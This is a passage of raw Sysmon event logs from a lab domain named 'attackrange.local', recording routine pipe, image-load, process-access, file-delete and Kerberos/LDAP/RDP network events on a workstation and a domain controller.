Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla 
Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001055742Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:11:06.529{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.6264.1220.102603015C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001055741Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:11:06.529{466BC892-3465-60E8-160C-00000000CF01}6264\chrome.6264.1220.102603015C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001055748Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:07.762{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B316B548A0C8F089A03251B45F763FB0,SHA256=B8AB85873D9D93F6F1F7CCBCF50CF60CF5C410C60E58C893BFF73B3FBA5762E5,IMPHASH=00000000000000000000000000000000falsetrue 734700x8000000000000000811012Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.672{0C1E0330-F91B-60EB-F879-00000000D001}4008C:\Windows\System32\taskhostw.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x8000000000000000811011Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:07.641{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811010Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.641{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811009Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:07.641{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811008Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.641{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811007Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:07.641{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811006Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.641{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811005Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:07.641{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811004Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.641{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811003Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:07.641{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811002Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.625{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1600-00000000D001}1192C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811001Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:07.625{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1600-00000000D001}1192C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000811000Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.328{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01D4864089724B4118E39341570057C6,SHA256=B4E2F898CF0AA6D612E45455FCCB5CEB00EA4160FE4F05CA5C021DF36808003F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055751Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:08.777{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E839E79DB38C40EC7F18BF1726805928,SHA256=874C120A27AD8B6F62850BFD64D064F73AB3E4EBDD7234179DC140CEADD762F4,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000811015Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:08.656{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C94FD9ACE15646AE05DCCC96ABFDF06F,SHA256=E1445FE012BC21FCFCFEDE8C5D7094B8307A3CEA6ED4AADA26EBF2FCD7E862F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811014Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:08.656{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EE0C8F635A18A736AABA19ABE8C44740,SHA256=B185318C747ECD4EFE62078D16173B5CB85471892FD2145E4AEE14A207008EFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811013Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:08.360{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FAA2CF2E0C23D916728C4A279DF9681,SHA256=72AFEC1C7CC471ED39DFCB3FC99BB3CD597B20D8A5C41F55E12F76E907CF8361,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055750Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:08.693{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=11D9B9A5B36C19BEE0A71016E68687F1,SHA256=5CB353F6D0CB319F2C4E05F78FD54BFF5B9C6FD908F5A7A973ACDF0690C0F6D3,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001055749Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:08.693{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BDA0A491CD975C8104B7943440407826,SHA256=9C8656D2CFC91CFC9485278217EA212FAF9A3174BB841392CD0F2E1DFCBFDDDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055761Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:09.777{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30A93410A2721E4B6E10115BB5416B1B,SHA256=2C8492668CB7CBEA20E407CBE5B9EAB1E3548EB971FA61506DC19EF3F0C6396D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000811023Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:08.169{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57512-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal88kerberos 354300x8000000000000000811022Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:08.167{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57511-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal88kerberos 354300x8000000000000000811021Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:08.165{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57510-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal88kerberos 354300x8000000000000000811020Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:08.055{0C1E0330-F91B-60EB-F879-00000000D001}4008C:\Windows\System32\taskhostw.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57509-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal389ldap 354300x8000000000000000811019Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.840{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.15win-host-623.attackrange.local60128-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal389- 354300x8000000000000000811018Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.826{0C1E0330-F91B-60EB-F879-00000000D001}4008C:\Windows\System32\taskhostw.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57508-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal389ldap 22542200x8000000000000000811017Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:08.068{0C1E0330-F91B-60EB-F879-00000000D001}4008win-dc-890.attackrange.local0::ffff:10.0.1.14;C:\Windows\System32\taskhostw.exe 23542300x8000000000000000811016Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:09.406{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=369F275FF4B5276DDDEE68A37185D4C4,SHA256=96067E0BCB298680676CD2002906ED9782CA306BD651701ED1E30338EBFEC27D,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001055760Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.540{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57512-false10.0.1.14win-dc-890.attackrange.local88kerberos 354300x80000000000000001055759Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.538{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57511-false10.0.1.14win-dc-890.attackrange.local88kerberos 354300x80000000000000001055758Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.536{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57510-false10.0.1.14win-dc-890.attackrange.local88kerberos 354300x80000000000000001055757Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.433{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local389-false10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal60130- 354300x80000000000000001055756Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.426{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57509-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001055755Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.318{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local389-false10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal60129- 
354300x80000000000000001055754Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.211{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local389-false10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal60128- 354300x80000000000000001055753Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.197{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57508-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001055752Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.014{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-51534-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001055773Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.801{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=696BA2FA4DCDD68E628AD3E9AE18CCEE,SHA256=F19EFC9F943A63111763BC937E4E4CA830A148EDB92E2394890206655DE09133,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811024Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:10.406{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88512DE157D0D1FB4DA6A9EE4CE794DB,SHA256=9113FE32A08E45D13E033AFC5D1420396066A8F45CFA130E0B4B0252DF216CCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055772Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.147{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=118E473BDE207CD2FFAFD72159EB51A2,SHA256=EBD972BF143857077B412FFAD25462B5FE2E3E14A0ECC9E23F702EE143AA6119,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055771Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.147{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E3D0D518D8F5AB6188D71F4763FCAB05,SHA256=AEB57D919F136FEBE2AB5919408C014C77C2AFF6F0903073DD7C1CCC9824946B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055770Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.147{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5B3DFDFA5E35F56CA7F764BBC7C9C3FF,SHA256=DAC1F98E8C6B51C8309F0C654DD3221E61F1E72950AF05C722B624EEF4E59705,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055769Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.147{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
